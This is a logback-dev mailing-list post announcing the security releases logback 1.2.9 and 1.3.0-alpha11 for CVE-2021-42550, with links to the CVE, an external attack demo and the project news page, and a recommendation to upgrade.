[logback-dev] Security Fix - logback 1.2.9 and 1.3.0-alpha11
Ceki Gülcü
ceki at qos.ch
Fri Dec 17 03:49:06 CET 2021
Hello all,
Since the publication of log4shell attack, a vulnerability of lesser
importance has been reported against logback, namely CVE-2021-42550.
See https://cve.report/CVE-2021-42550 for a description.
See https://github.com/cn-panda/logbackRceDemo for a demo of the
attack.
In response, we have made several changes in logback components as to
harden them. We have also dropped Groovy configuration support with no
replacement.
Please refer to the news page for more details.
http://logback.qos.ch/news.html
Even if the vulnerability found in logback is less threatening, we
highly recommend that you upgrade to logback version 1.2.9 if you are on
the 1.2.x series and to version 1.3.0-alpha11 if you are already on
1.3.x series.
Best regards,
--
Ceki Gülcü
Please contact suppport(at)qos.ch for donations, sponsorship or support
contracts related to SLF4J or logback projects.
More information about the logback-dev
mailing list